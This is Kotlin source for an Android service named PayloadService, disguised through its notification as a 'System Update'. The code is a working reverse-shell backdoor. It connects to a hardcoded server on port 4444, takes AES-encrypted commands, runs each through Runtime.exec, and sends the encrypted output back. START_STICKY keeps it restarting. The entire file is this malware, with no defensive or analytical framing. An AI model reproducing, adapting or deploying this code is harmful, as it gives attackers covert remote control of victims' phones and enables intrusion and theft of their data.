package com.example.systemupdate

import android.annotation.SuppressLint
import android.app.NotificationChannel
import android.app.NotificationManager
import android.app.Service
import android.content.Intent
import android.os.Build
import android.os.IBinder
import android.util.Base64
import android.util.Log
import androidx.core.app.NotificationCompat
import java.io.BufferedReader
import java.io.InputStreamReader
import java.io.PrintWriter
import java.net.Socket
import java.security.MessageDigest
import javax.crypto.Cipher
import javax.crypto.spec.SecretKeySpec
import android.content.pm.ServiceInfo

class PayloadService : Service() {

    private val TAG = "PayloadService"
    private val CHANNEL_ID = "sys_update_ch"
    private val NOTIF_ID = 1

    // 🔒 Replace with actual IP/port/secret key as needed
    private val SERVER_IP = "172.26.14.57"
    private val SERVER_PORT = 4444
    private val SECRET_KEY = "s3cr3tK3y1234567"

    private var worker: Thread? = null

    @SuppressLint("ForegroundServiceType")
    override fun onCreate() {
        super.onCreate()
        createChannel()

        val notif = NotificationCompat.Builder(this, CHANNEL_ID)
            .setContentTitle("System Update")
            .setContentText("Updating system in background")
            .setSmallIcon(android.R.drawable.stat_sys_download)
            .setOngoing(true)
            .build()

        // ✅ Start with service type hint on Android 14+
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.UPSIDE_DOWN_CAKE) {
            startForeground(NOTIF_ID, notif, ServiceInfo.FOREGROUND_SERVICE_TYPE_DATA_SYNC)
        } else {
            startForeground(NOTIF_ID, notif)
        }
    }

    override fun onStartCommand(intent: Intent?, flags: Int, startId: Int): Int {
        worker = Thread { runPayload() }
        worker?.start()
        return START_STICKY
    }

    private fun runPayload() {
        try {
            Socket(SERVER_IP, SERVER_PORT).use { socket ->
                val out = PrintWriter(socket.getOutputStream(), true)
                val input = BufferedReader(InputStreamReader(socket.getInputStream()))

                sendEncrypted(out, "Android device connected")

                var line: String?
                while (input.readLine().also { line = it } != null) {
                    val cmd = decrypt(line!!)
                    Log.d(TAG, "Cmd: $cmd")
                    val output = execCmd(cmd)
                    sendEncrypted(out, output)
                }
            }
        } catch (e: Exception) {
            Log.e(TAG, "Connection error", e)
        } finally {
            stopSelf()
        }
    }

    private fun execCmd(cmd: String): String {
        return try {
            val proc = Runtime.getRuntime().exec(cmd)
            val reader = BufferedReader(InputStreamReader(proc.inputStream))
            val output = StringBuilder()
            var line: String?
            while (reader.readLine().also { line = it } != null) {
                output.append(line).append("\n")
            }
            reader.close()
            proc.waitFor()
            output.toString().trim()
        } catch (e: Exception) {
            "Error: ${e.message}"
        }
    }

    private fun sendEncrypted(out: PrintWriter, msg: String) {
        try {
            val enc = encrypt(msg)
            out.println(enc)
        } catch (e: Exception) {
            Log.e(TAG, "Encryption error", e)
        }
    }

    private fun encrypt(str: String): String {
        val key = genKey(SECRET_KEY)
        val cipher = Cipher.getInstance("AES/ECB/PKCS5Padding")
        cipher.init(Cipher.ENCRYPT_MODE, key)
        val enc = cipher.doFinal(str.toByteArray(Charsets.UTF_8))
        return Base64.encodeToString(enc, Base64.NO_WRAP)
    }

    private fun decrypt(str: String): String {
        val key = genKey(SECRET_KEY)
        val cipher = Cipher.getInstance("AES/ECB/PKCS5Padding")
        cipher.init(Cipher.DECRYPT_MODE, key)
        val decoded = Base64.decode(str, Base64.NO_WRAP)
        return String(cipher.doFinal(decoded))
    }

    private fun genKey(myKey: String): SecretKeySpec {
        val sha = MessageDigest.getInstance("SHA-1")
        var key = myKey.toByteArray(Charsets.UTF_8)
        key = sha.digest(key)
        key = key.copyOf(16)
        return SecretKeySpec(key, "AES")
    }

    override fun onDestroy() {
        worker?.interrupt()
        super.onDestroy()
    }

    override fun onBind(intent: Intent?): IBinder? = null

    private fun createChannel() {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            val name = "System Update Channel"
            val description = "Foreground service channel for updates"
            val importance = NotificationManager.IMPORTANCE_LOW
            val channel = NotificationChannel(CHANNEL_ID, name, importance).apply {
                this.description = description
            }
            val notificationManager = getSystemService(NotificationManager::class.java)
            notificationManager.createNotificationChannel(channel)
        }
    }
}
